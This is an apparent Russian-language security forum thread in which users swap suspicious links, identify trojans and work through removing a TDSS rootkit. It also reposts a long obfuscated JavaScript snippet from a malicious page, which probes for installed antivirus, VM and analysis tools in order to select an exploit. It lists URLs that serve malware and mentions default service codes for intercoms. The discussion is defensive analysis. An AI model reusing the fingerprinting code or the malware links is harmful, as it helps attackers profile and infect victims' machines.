> Открывает до 90% всех домофонов
> Уникальная разработка волгоградских мастеров
> «Домофонный мастер ключ»


Какой то чувак написал:



> Для первых 100 заказчиков в подарок автоген, фомка и пара черных капроновых чулок!

----------


## Jolly Rojer

"Универсальный домофонный мульти ключ – вездеход Открывает до 90% всех домофонов" всеже такой есть реально ... но только одного типа замков. Откуда знаю, друг работает монтажником в одном из местных ИСП и по долгу работы постоянно вынужден ходить по подъездам и лазить по крышам, а названивать или просить открыть когонить подъезд где расположен коммутационный узел просто надоедает. Вот и нашли кулибина который им такой ключик сделал.

----------


## TOsha

У нас в стране не так много типов домофонов ставят.
У всех домофонов есть сервисный код для открытия двери без ключа.
По умолчанию - один для всех домофонов данного типа (Визит, Leksomex и т.д.).
Установщики обычно не парятся со сменой кода - им удобнее, когда у всех дверей один код, чем помнить сотни разных.
Сам работал в монтаже этой хрени. Без всяких ключей открываю те-же 90% домофонов в нашем городе.

----------


## valho

А если маленько посильнее дёрнуть за дверь то она и так открывается

----------


## TOsha

> А если маленько посильнее дёрнуть за дверь то она и так открывается


Ога 4000 нютон\метр.
Скорее ручка оторвётся, или дверь погнётся.

----------


## valho

У нас в доме так открывают, а сейчас уже смотрю несколько дней дверь вовсе не защёлкивается  :Smiley:

----------


## ScratchyClaws

у нас в доме был известный части жильцов *некий код* которым можно было открыть домофон... но в подъезде регулярно собирались пьянствовать разные компании... + в нашем доме в одном из подъездов вечером ограбили женщину угрожая пистолетом.... этот код благополучно отключили... результат - компании все так же собираются (не в лом позвонить кому-нибудь или зайти за кем-нибудь) а жильцам не удобно.

у нас домофон в квартире сломан... приходится гостей встречать у подъезда.

----------


## valho

:"http://": zelenkovityufi.narod.ru/map.html
Дорвей, только дохлый, большинство сайтов уже нет в помине
---
Видимо всё таки закон сохранения существует. Это насчёт глючных дверей с магнитным замком.
Кто то в лифте у нас уже успел наклеить бумажки

----------


## bolshoy kot

_http://valentino4ka.co.cc
Что там?

----------

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

----------


## valho

> _http://valentino4ka.co.cc
> Что там?


Бяка  :Smiley:

----------


## Гриша

> Что там?


*Trojan-SMS.J2ME.Boxer.i*

----------


## valho

microsoft-security.ru

----------


## bolshoy kot

valho, и что Вас там удивило? Мне кажется, там сайт компьютерной помощи.

----------


## valho

Да так ничего, помойки всякой в интернете слишком много развелось просто...

----------


## priv8v

> Да так ничего, помойки всякой в интернете слишком много развелось просто...


регнулись на юкозе. поменяли диз. привязали домен. согласен, что трэш

----------


## bolshoy kot

Единственное но - незаконно используется название Microsoft.

----------


## valho

widgeo.net
При загрузке пытается получить доступ к буферу обмена.
Похоже что если разрешить доступ и полазить по сайту в буфер какую нибудь бяку пропишут.
Нашёл по этому только:
http://www.securitylab.ru/news/358290.php
http://support.microsoft.com/kb/224993/ru
---
Ссылка на эту странную вещь - mypeopleunlimited.com/mgt/old/creek.php

----------


## naik212006

ugdom.ru
На самом сайте вроде бы чисто, а вот в архивах журнала...
При попытке открыть архивы подгружается Troyan.Click 25525 по классификации DrWeb.
Звонил редактору журнала - обещали принять меры, но пока ничего...

----------


## Serrrgio

> Ссылка на эту странную вещь - mypeopleunlimited.com/mgt/old/creek.php


а вещь интересная, что делает пока еще не выяснил, но похоже собирает инфу о кампе, какой софт стоит, какие антивирусы, ,браузеры плееры и куча всякого софта, вот кусок

```
    var QmwrmsukbB = new Array(26);
     var BxwrUnJUSvZkOQRnBx = "res://c:\\program%20files\\";
     var eeYcZfmxOvpnjcHlzYgGirPN=0;
     var DvvePofzXKCOGQVdAJyHCh=new Image();
     DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "Avira\\AntiVir PersonalEdition Classic\\avconfig.dll/#2/#129";
     if (DvvePofzXKCOGQVdAJyHCh.height != 30)
     {
       QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
     }
     eeYcZfmxOvpnjcHlzYgGirPN++;
     DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "Alwil Software\\Avast4\\AavmGuih.dll/#2/#132";
     if (DvvePofzXKCOGQVdAJyHCh.height != 30)
     {
       QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
     }
     eeYcZfmxOvpnjcHlzYgGirPN++;
     DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "Antiviral Toolkit Pro\\avp32.exe/#2/#158";
     if (DvvePofzXKCOGQVdAJyHCh.height != 30)
     {
       QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
     }
     eeYcZfmxOvpnjcHlzYgGirPN++;
     DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "Grisoft\\AVG Free\\avgabout.dll/#2/#5110";
     if (DvvePofzXKCOGQVdAJyHCh.height != 30)
     {
       QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
     }
     eeYcZfmxOvpnjcHlzYgGirPN++;
     DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "Grisoft\\AVG7\\avgdiag.exe/#2/#131";
     if (DvvePofzXKCOGQVdAJyHCh.height != 30)
     {
       QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
     }
     eeYcZfmxOvpnjcHlzYgGirPN++;
     DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "AVG\\AVG8\\avgresf.dll/#2/#11500";
     if (DvvePofzXKCOGQVdAJyHCh.height != 30)
     {
       QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
     }
     eeYcZfmxOvpnjcHlzYgGirPN++;
     DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "Softwin\\BitDefender9\\bdsubmit.exe/#2/#132";
     if (DvvePofzXKCOGQVdAJyHCh.height != 30)
     {
       QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
     }
     eeYcZfmxOvpnjcHlzYgGirPN++;
     DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "Softwin\\BitDefender10\\bdsubmit.exe/#2/#132";
     if (DvvePofzXKCOGQVdAJyHCh.height != 30)
     {
       QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
     }
     eeYcZfmxOvpnjcHlzYgGirPN++;
     DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "BitDefender\\BitDefender 2008\\bdsubwiz.exe/#2/#132";
     if (DvvePofzXKCOGQVdAJyHCh.height != 30)
     {
       QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
     }
     eeYcZfmxOvpnjcHlzYgGirPN++;
     DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "CA\\eTrust Internet Security Suite\\eTrust EZ Antivirus\\CAVres.dll/#2/#145";
     if (DvvePofzXKCOGQVdAJyHCh.height != 30)
     {
       QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
     }
     eeYcZfmxOvpnjcHlzYgGirPN++;
     DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "DrWeb\\drweb32w.exe/#2/#105";
     if (DvvePofzXKCOGQVdAJyHCh.height != 30)
     {
       QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
     }
     eeYcZfmxOvpnjcHlzYgGirPN++;
     DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "ESET\\emon.dll/#2/#1";
     if (DvvePofzXKCOGQVdAJyHCh.height != 30)
     {
       QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
     }
     eeYcZfmxOvpnjcHlzYgGirPN++;
     DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "ESET\\ESET Smart Security\\eguiEpfw.dll/#2/#1070";
     if (DvvePofzXKCOGQVdAJyHCh.height != 30)
     {
       QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
     }
     eeYcZfmxOvpnjcHlzYgGirPN++;
     DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "Kaspersky Lab\\Kaspersky Internet Security 7.0\\mcouas.dll/#2/#218";
     if (DvvePofzXKCOGQVdAJyHCh.height != 30)
     {
       QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
     }
     eeYcZfmxOvpnjcHlzYgGirPN++;
     DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "Kaspersky Lab\\Kaspersky Internet Security 2009\\mcouas.dll/#2/#218";
     if (DvvePofzXKCOGQVdAJyHCh.height != 30)
     {
       QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
     }
     eeYcZfmxOvpnjcHlzYgGirPN++;
     DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "Kerio\\Personal Firewall 4\\kpf4gui.exe/#2/#135";
     if (DvvePofzXKCOGQVdAJyHCh.height != 30)
     {
       QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
     }
     eeYcZfmxOvpnjcHlzYgGirPN++;
     DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "Trend Micro\\Internet Security 2006\\PCCVScan.exe/#2/#130";
     if (DvvePofzXKCOGQVdAJyHCh.height != 30)
     {
       QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
     }
     eeYcZfmxOvpnjcHlzYgGirPN++;
     DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "Panda Software\\Panda platinium 2006 Internet Security\\pavsched.exe/#2/#300";
     if (DvvePofzXKCOGQVdAJyHCh.height != 30)
     {
       QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
     }
     eeYcZfmxOvpnjcHlzYgGirPN++;
     DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "F-Secure Internet Security\\FSGUI\\fsavgui.exe/#2/#26567";
     if (DvvePofzXKCOGQVdAJyHCh.height != 30)
     {
       QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
     }
     eeYcZfmxOvpnjcHlzYgGirPN++;
     DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "F-Secure Internet Security\\Anti-Virus\\fstsm.dll/#2/#103";
     if (DvvePofzXKCOGQVdAJyHCh.height != 30)
     {
       QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
     }
     eeYcZfmxOvpnjcHlzYgGirPN++;
     DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "McAfee.com\\Agent\\scres.dll/#2/#200";
     if (DvvePofzXKCOGQVdAJyHCh.height != 30)
     {
       QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
     }
     eeYcZfmxOvpnjcHlzYgGirPN++;
     DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "Network Associates\\VirusScan\\graphics.dll/#2/#200";
     if (DvvePofzXKCOGQVdAJyHCh.height != 30)
     {
       QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
     }
     eeYcZfmxOvpnjcHlzYgGirPN++;
     DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "symantec_client_security\\symantec%20antivirus\\vpc32.exe/#2/#157";
     if (DvvePofzXKCOGQVdAJyHCh.height != 30)
     {
       QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
     }
     eeYcZfmxOvpnjcHlzYgGirPN++;
     DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "Norton Internet Security Professional\\NISABOUT.DLL/#2/#204";
     if (DvvePofzXKCOGQVdAJyHCh.height != 30)
     {
       QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
     }
     eeYcZfmxOvpnjcHlzYgGirPN++;
     DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "Symantec\\Symantec Endpoint Protection\\res\\1036\\DWHWizrdRes.dll/#2/#167";
     if (DvvePofzXKCOGQVdAJyHCh.height != 30)
     {
       QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
     }
     eeYcZfmxOvpnjcHlzYgGirPN++;
     DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "Norton Internet Security\\ACDisp.dll/#2/#107";
     if (DvvePofzXKCOGQVdAJyHCh.height != 30)
     {
       QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
     }
     eeYcZfmxOvpnjcHlzYgGirPN++;
     DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "zone labs\\zonealarm\\zlclient.exe/#2/#102";
     if (DvvePofzXKCOGQVdAJyHCh.height != 30)
     {
       QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
     }
     eeYcZfmxOvpnjcHlzYgGirPN++;
     DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "VMware\\VMware Tools\\VMControlPanel.cpl/#2/#2507";
     if (DvvePofzXKCOGQVdAJyHCh.height != 30)
     {
       QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
     }
     eeYcZfmxOvpnjcHlzYgGirPN++;
     DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "VMware\\VMware Workstation\\vmplayer.exe/#2/#1";
     if (DvvePofzXKCOGQVdAJyHCh.height != 30)
     {
       QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
     }
     eeYcZfmxOvpnjcHlzYgGirPN++;
     DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "VMware\\VMware Workstation\\vmplayer.exe/#2/#28";
     if (DvvePofzXKCOGQVdAJyHCh.height != 30)
     {
       QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
     }
     eeYcZfmxOvpnjcHlzYgGirPN++;
     DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "Wireshark\\uninstall.exe/#2/#110";
     if (DvvePofzXKCOGQVdAJyHCh.height != 30)
     {
       QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
     }
     eeYcZfmxOvpnjcHlzYgGirPN++;
     DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "IDA\\idag.exe/#2/#201";
     if (DvvePofzXKCOGQVdAJyHCh.height != 30)
     {
       QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
     }
     eeYcZfmxOvpnjcHlzYgGirPN++;
     DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "ShadowStor\\ShadowSurfer\\ShadowSurfer.exe/#2/#174";
     if (DvvePofzXKCOGQVdAJyHCh.height != 30)
     {
       QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
     }
     eeYcZfmxOvpnjcHlzYgGirPN++;
     DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "Microsoft Office\\Office\\MSOWC.DLL/#2/#390";
     if (DvvePofzXKCOGQVdAJyHCh.height != 30)
     {
       QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
     }
     eeYcZfmxOvpnjcHlzYgGirPN++;
     DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "Microsoft Office\\OFFICE10\\MSOWC.DLL/#2/#390";
     if (DvvePofzXKCOGQVdAJyHCh.height != 30)
     {
       QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
     }
     eeYcZfmxOvpnjcHlzYgGirPN++;
     DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "Microsoft Office\\OFFICE11\\OMFC.DLL/#2/#30994";
     if (DvvePofzXKCOGQVdAJyHCh.height != 30)
     {
       QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
     }
     eeYcZfmxOvpnjcHlzYgGirPN++;
     DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "Microsoft Office\\Office12\\OFFOWC.DLL#2#390";
     if (DvvePofzXKCOGQVdAJyHCh.height != 30)
     {
       QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
     }
     eeYcZfmxOvpnjcHlzYgGirPN++;
     DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "Microsoft Works\\1033\\Manual\\bookimg.jpg";
     if (DvvePofzXKCOGQVdAJyHCh.height != 30)
     {
       QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
     }
     eeYcZfmxOvpnjcHlzYgGirPN++;
     DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "Mozilla Thunderbird\\chrome\\icons\\default\\addressbookWindow.ico";
     if (DvvePofzXKCOGQVdAJyHCh.height != 30)
     {
       QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
     }
     eeYcZfmxOvpnjcHlzYgGirPN++;
     DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "Opera\\styles\\images\\center.png";
     if (DvvePofzXKCOGQVdAJyHCh.height != 30)
     {
       QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
     }
     eeYcZfmxOvpnjcHlzYgGirPN++;
     DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "VideoLAN\\VLC\\uninstall.exe/#2/#110";
     if (DvvePofzXKCOGQVdAJyHCh.height != 30)
     {
       QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
     }
     eeYcZfmxOvpnjcHlzYgGirPN++;
     DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "winamp\\winamp.exe/#2/#109";
     if (DvvePofzXKCOGQVdAJyHCh.height != 30)
     {
       QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
     }
     eeYcZfmxOvpnjcHlzYgGirPN++;
     DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "RealVNC\\VNC4\\vncviewer.exe/#2/#120";
     if (DvvePofzXKCOGQVdAJyHCh.height != 30)
     {
       QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
     }
     eeYcZfmxOvpnjcHlzYgGirPN++;
     DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "Messenger\\msmsgs.exe/#2/#607";
     if (DvvePofzXKCOGQVdAJyHCh.height != 30)
     {
       QmwrmsukbB[eeYcZfmxOvpnjcHlzYgGirPN]=1;
     }
     eeYcZfmxOvpnjcHlzYgGirPN++;
     DvvePofzXKCOGQVdAJyHCh.src = BxwrUnJUSvZkOQRnBx + "Yahoo!\\Messenger\\YPagerChecker.dll/#2/#102";
```

одно не понятно, как JS получает доступ к файлам кампа???
на выходных попробую разобратся.

----------


## Serrrgio

вобщем так и есть, скрипт собирает информацию об установленных плагинах браузера и софте, самым болтливым оказался IE
скорее всего служит для динамического подбора эксплоита под установленное ПО.

----------


## bolshoy kot

_http://vero4ka.co.cc

----------


## Rampant

Посмотрите на этот сайт kpyto.net.ru, знакомый говорит у него касперский сдулся на нём, мой БитДефендер сообщил о загрузке активного содержимого, я его заблокировал, и ничего подозрительного не увидел.

----------


## bolshoy kot

_http://vero4ka.co.cc что же там?

*Добавлено через 1 час 7 минут*

Там JAVA-программа, видать мобильный троян. Интересно, кто нибудь догадается, что его надо в телефон загружать?

----------


## Lexxus

*bolshoy kot*, ммм... нет...
совершенно не факт, что это для мобильника  :Wink: 
Скачал посмотрел, внутри порно картинка и много файлов *.class + один .dat

----------


## Kuzz

> _http://valentino4ka.co.cc
> Что там?





> *Trojan-SMS.J2ME.Boxer.i*





> _http://vero4ka.co.cc





> Там JAVA-программа, видать мобильный троян. Интересно, кто нибудь догадается, что его надо в телефон загружать?


Закономерность (в имени доменов) прослеживается?  :Wink:

----------


## bolshoy kot

_http://jwtdigital.reali-tech.com/innovate/013/
В чем суть "развода"?

----------


## valho

Какое то предложение по халявным звонкам через 013, а что это значит....... :Smiley:

----------


## bolshoy kot

valho, да насчет халявных звонков через 013 понятно, а вот чем "халява" может обернутся - нет...

----------


## drongo

> valho, да насчет халявных звонков через 013 понятно, а вот чем "халява" может обернутся - нет...


Ну как минимум потом будут рекламными предложениями заваливать :"Ну купите наш пакет, ну купите  :Smiley: "
Предлагаю более безвредный вариант - ещё можно минуты заработать на входящих  :Smiley:  (Так как 013 вам перезванивает и соединяет )
Регистрируеетесь на spikko (  :"http://": www.spikko.com/index_en.htm ),  клиент ихний устанавливаете и оставляете в режиме ожидания. Потом заходите на сайт 013 и вставляете во вторую колонку тот номер телефона который получили в спико. В  клиенте спико надо будет принять звонок и говорить. Только вот минут дают меньше чем обещали, где-то минут 5 дали на разговор с Канадой.
Да, микрофон не забудьте подключить  :Smiley: 
Пока телофоны от спико не заблокировали, нечего опасаться.

----------

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

----------


## bolshoy kot

drongo, так что "013-халява" работает?!
Насчет рекламных предложений понятно...

----------


## drongo

> drongo, так что "013-халява" работает?!
> Насчет рекламных предложений понятно...


Работает, но это больше похоже на   adaware inside  :Smiley: 
Только я не желаю записывать личный телефон  в их базу, чтобы потом надоедали со своими предложениями. Поэтому предложил действующий  Noadware вариант использования  :Smiley:

----------


## bolshoy kot

_http://poiskmobi.ru/
Интересует, что там за isms.jar...

----------


## Kuzz

>http://poiskmobi.ру/download.php?get=isms.jar/Main.class infected with Java.SMSSend.37
>http://poiskmobi.ру/download.php?get=isms.jar/a.class infected with Java.Isms.3
>http://poiskmobi.ру/download.php?get=isms.jar/b.class infected with Java.SMSSend.37
>http://poiskmobi.ру/download.php?get=isms.jar/c.class infected with Java.SMSSend.37
>http://poiskmobi.ру/download.php?get=isms.jar/d.class infected with Java.SMSSend.37

----------


## bolshoy kot

_http://195.28.79.102/rutelevision/setup.exe
Я подозреваю, что после запуска этой программы стерлись все файлы на D:  :Sad:   :Sad:   :Sad:

----------


## bolshoy kot

_http://jetfilez.com/app-2214
Проверьте, что там за файлы.
Инсталляторы NSIS ставят некий TEMP\DVDConv.exe

*Добавлено через 5 минут*

"The scanner that was processing your file is stopped at this moment, we are going to wait a few seconds to try to recover your result."
На VirusTotal не проверяет!

----------


## valho

Руткит, 
Примерно что то из этой оперы kadets.info/showthread.php?p=699941

----------


## bolshoy kot

http://www.virustotal.com/analisis/9...851-1245494708

*Добавлено через 2 минуты*

Что интересно, при запуске вывелось EULA. После чего началась странная активность процесса "spoolsv.exe".

*Добавлено через 1 минуту*

В модулях spoolsv.exe некий dll.dll. Файла такого нет.

*Добавлено через 3 минуты*

http://forum.drweb.com/index.php?sho...d=311519&st=0&

----------


## valho

Случайно нашёл в этом блоге рекомендацию на утилиту про удаление этой бяки
bias9.blogspot.com/2008/11/tdss-rootkit-removal.html
esagelab.ru
так ничё и не понял
http://www.virustotal.com/analisis/f...5aa-1245496493
http://www.virustotal.com/analisis/5...e9b-1245335408
Наверно что бы удалить такую заразу, нужно сделать анти-заразу  :Smiley:

----------


## bolshoy kot

Я заразил им виртуальный ПК.
AVZ удалил dll.dll и temp-файл.
В логах осталось назначенное задание.
Как очистить Virtual PC?
Могу переустановить ОС там легко, но хочу знать, как его удалить.

*Добавлено через 42 секунды*

tdss* там удалять предлагают из-под другой ОС

----------


## Kuzz

> Случайно нашёл в этом блоге рекомендацию на утилиту про удаление этой бяки
> bias9.blogspot.com/2008/11/tdss-rootkit-removal.html
> esagelab.ru
> так ничё и не понял


http://virusinfo.info/showthread.php?t=47966
даже можете все уточнить))

----------


## valho

> Я заразил им виртуальный ПК.
> AVZ удалил dll.dll и temp-файл.
> В логах осталось назначенное задание.
> Как очистить Virtual PC?
> Могу переустановить ОС там легко, но хочу знать, как его удалить.
> 
> *Добавлено через 42 секунды*
> 
> tdss* там удалять предлагают из-под другой ОС


Давайте это поюзайте http://esagelab.ru/ потом скажите чё там вышло

----------


## bolshoy kot

Прикол в том, что я в упор не вижу подозрительных драйверов в логе AVZ.

*Добавлено через 48 секунд*

Но spoolsv.exe кто-то заставляет врубать TEMP. После удаления dll.dll и temp* файла temp врубатся перестал... Хм, может логи выложу. Там в HijackThis после его запуска появляются вроде DNS-сервера.

----------


## valho

Решил сам попробовать, прога от http://esagelab.ru/ пашет нормуль, можно юзать 
Другими способами искать, там с помощью AVZ или другими пока не пробовал

http://www.prevx.com/filenames/X3408...XSERV.SYS.html

----------


## valho

> Прикол в том, что я в упор не вижу подозрительных драйверов в логе AVZ.
> *Добавлено через 48 секунд*
> Но spoolsv.exe кто-то заставляет врубать TEMP. После удаления dll.dll и temp* файла temp врубатся перестал... Хм, может логи выложу. Там в HijackThis после его запуска появляются вроде DNS-сервера.


ТЕМP запускается планировщиком, ещё заметил что у спулера потребление памяти в 10 раз больше, адреса при просмотре HijackThis прописались домена trusted-dns.com, это мошеннический сайт. Похоже что один находится в Латвии другой в Украине. HijackThis запустился только преименованным и с другим расширением. Хе, MBA тоже не запускается, AVZ ничего не показал. Посмотрел логи gmer нашёл какие то модули aujasnkj.sys в темпе http://forum.drweb.com/index.php?showtopic=278404.
Заметил ещё что диск C:\ монтирован 01.01.1601 года в 4 часа утра  :Smiley: 
Теперь думаю как это всё исправлять

----------


## Гриша

> AVZ ничего не показал


Как дроппер детектится? Это DVDConv.exe пробовал?

Хы-хы-хы, посмотрел топик на форуме Доктора, круто они там ловят драйвер gmer (aujasnkj.sys)  :Cheesy:

----------


## valho

> Как дроппер детектится? Это DVDConv.exe пробовал?


http://www.virustotal.com/ru/analisi...902-1245590012
находится в планировщике
Ещё какой то
http://www.virustotal.com/ru/analisi...f76-1245590166
AVZ находит - Trojan-Downloader.Win32.Small.jqv он появился позднее.
Вот это правда немного не понял



> Функция NtEnumerateKey (47) - модификация машинного кода. Метод JmpTo. jmp 8232829C
> Функция NtFlushInstructionCache (4E) - модификация машинного кода. Метод JmpTo. jmp 823284B4
> Функция IofCallDriver (804E37C5) - модификация машинного кода. Метод JmpTo. jmp 8221C9F3 
> Функция IofCompleteRequest (804E3BF6) - модификация машинного кода. Метод JmpTo. jmp 821D95E3


Вот тут тоже показал



> Подозрение на троянский DNS ({BD3388B8-0AB9-4A73-92A7-4DF7264649D0} "Подключение по локальной сети")


DVDConv.exe куда то пропал, детектится доктором веб примерно Backdoor.TDSS.119
  Пока что сделал ещё раз логи полностью, как надо  :Smiley:  по умолчанию

----------


## Гриша

> DVDConv.exe куда то пропал


Ты его запускал? Он помещается в отложенное удаление после запуска...




> Вот это правда немного не понял


Это перехваты Tdss...

Логи нужно делать с включенным AVZPM...

Тут я все описал, за исключением довнлоадера, который прописывается в темпе и запускается планировщиком...

----------


## valho

Вроде не запускал его, только инсталлятор Hide.Folder.HiBit.FreeVer.5.3, но наверняка DVDConv запускался

----------


## Гриша

В моем случае я брал DVDConv.exe он и описан в блоге, но смысла это не меняет...

----------

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

----------


## valho

а где почитать можно?  :Smiley: 
---
Ой, увидел ссылу наконец то  :Cheesy: 
Удалось запустить нормально gmer и mba, вроде всё убилось. Наверно ещё придётся на всякий случай просканить sfc. Одного только не понял, в систему должны были загрузить фальшивый антивирус, почему этого не произошло? Я ведь долго ждал  :Smiley:

----------


## Гриша

> в систему должны были загрузить фальшивый антивирус


Я не застал этого момента, нужно было подождать, чтобы довнлоадер отработал...

----------


## bolshoy kot

> ТЕМP запускается планировщиком, ещё заметил что у спулера потребление памяти в 10 раз больше, адреса при просмотре HijackThis прописались домена trusted-dns.com, это мошеннический сайт. Похоже что один находится в Латвии другой в Украине. HijackThis запустился только преименованным и с другим расширением. Хе, MBA тоже не запускается, AVZ ничего не показал. Посмотрел логи gmer нашёл какие то модули aujasnkj.sys в темпе http://forum.drweb.com/index.php?showtopic=278404.
> Заметил ещё что диск C:\ монтирован 01.01.1601 года в 4 часа утра 
> Теперь думаю как это всё исправлять


Планировщик - это "svchost.exe", а "spoolsv.exe" - подсистема печати (спулер/Диспетчер очереди печати). Т.е. как я понял, из скрытого драйвера идет внедрение в процесс "spoolsv.exe" кода, запускающего TEMP. Однако же и в планировщике TEMP тоже прописан. Кстати, при запуске инсталлятора выводится лицензионное соглашение.  :Smiley:  Также имеется деинсталлятор, однако он удаляет лишь ярлык на фиктивную программу. Вирус остается.

*Добавлено через 22 минуты*

Утилита eSagelab задала вопрос про какой-то "flag" - нажал Да, теперь висит "Запуск Windows"...

----------


## valho

Поставил бяку снова, сижу смотрю чё будут грузить, пока идут соединения по HTTP на opatraler.com

*Добавлено через 55 минут*

В планировщике заданий установлено скрытно задание
http://www.virustotal.com/ru/analisi...902-1245590012

 

 переписывал его в другую папку, делал её видимой, потом снова на место ставил и он снова прятался

----------


## bolshoy kot

_http://coolyoutubeproxy.com/promo

*Добавлено через 53 минуты*

http://www.virustotal.com/analisis/3...84d-1245653667
http://www.virustotal.com/analisis/4...966-1245656404
http://www.virustotal.com/analisis/d...68c-1245656556

----------


## Никита Соловьев

